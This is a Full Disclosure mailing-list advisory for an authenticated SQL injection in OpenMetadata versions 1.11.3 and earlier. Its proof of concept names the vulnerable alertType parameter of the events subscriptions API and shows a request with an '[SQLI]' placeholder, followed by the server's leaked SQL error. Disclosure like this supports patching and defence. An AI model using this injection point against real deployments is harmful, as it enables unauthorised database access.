lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <b4130733-bd34-44b4-9eb0-4af61d9fe02b@gmail.com>
Date: Tue, 20 Jan 2026 19:32:37 +0100
From: BUG <secbugs3@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] OpenMetadata <= 1.11.3 Authenticated SQL Injection

#### Title:OpenMetadata <= 1.11.3 Authenticated SQL Injection
#### Affected versions: <= 1.11.3
#### Credits: echo
#### Vendor: https://open-metadata.org/

OpenMetadata versions 1.11.3 and earlier are vulnerable to an 
authenticated SQL injection issue.
Low-privileged users can exploit this vulnerability to gain unauthorized 
access to the database in the context of the database user associated 
with the application.

POC:

request:

GET /api/v1/events/subscriptions?limit=15&alertType=Observability'[SQLI] 
HTTP/1.1/1.1
Host: localhost
Cache-Control: max-age=0
Sec-CH-UA: "Chromium";v="141", "Not;A=Brand";v="24", "Google Chrome";v="141"
Sec-CH-UA-Mobile: ?0
Sec-CH-UA-Platform: "Windows"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: application/json, text/plain, /
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Authorization: Bearer [redacted]
Referer [redacted]

response:

HTTP/1.1 500 Server Error
Content-Type: application/json
Content-Length: 562
Connection: close
Date: Thu, 23 Oct 2025 10:38:02 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains

{"responseMessage":"An exception with message 
[java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the 
right syntax to use near ''Observability''' at line 1 [statement:"/* 
EventSubscriptionDAO.listCount */ SELECT count(nameHash) F

-----BEGIN PGP PUBLIC KEY BLOCK-----

xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQ
m0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78
QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLl
oMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVT
HhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEB
B0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYh
BFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1
KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/
YPBCvA4bkQ9SA37Ak2UDDg==
=6VCh
-----END PGP PUBLIC KEY BLOCK-----

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ